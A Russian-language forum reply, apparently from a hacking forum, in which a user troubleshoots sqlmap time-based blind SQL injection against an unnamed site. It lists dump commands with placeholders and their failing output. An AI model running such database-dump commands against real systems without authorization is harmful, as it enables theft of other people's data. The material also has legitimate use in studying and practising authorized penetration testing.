Попробуй без дополнительных параметров - sqlmap -u URL -D БД -T таблица -C колонка --dump
Отчет:
1) Если оставить только параметры, данные вами, то он выведет критическую ошибку и попросит: "no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in '
Ссылка скрыта от гостей
'). You are advised to rerun with '--forms --crawl=2'"
2) Если следовать данным рекомендациям то это приведет к такому (sqlmap -u URL --forms --crawl=2 -D БД -T таблица -C колонка --dump ):
[WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[WARNING] unable to retrieve the number of column(s) 'колонка' entries for table 'таблица' in database 'БД'
3 c hex) При доблении --hex получаем (sqlmap -u URL --forms --crawl=2 -D БД -T таблица -C колонка --dump --hex):
WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[INFO] retrieved:
[WARNING] unable to retrieve the number of column(s) 'колонка' entries for table 'таблица' in database 'БД'
4 с no-cast) При добавлении --no-cast выведет (sqlmap -u URL --forms --crawl=2 -D БД -T таблица -C колонка --dump --no-cast ):
[WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[WARNING] unable to retrieve the number of column(s) 'колонка' entries for table 'таблица' in database 'БД'
5 с no-cast и с time-sec) При добавлении --no-cast с --time-sec=15 выведет (sqlmap -u URL --forms --crawl=2 -D БД -T таблица -C колонка --dump --no-cast --time-sec=15):
[WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[WARNING] unable to retrieve the number of column(s) 'колонка' entries for table 'таблица' in database 'БД'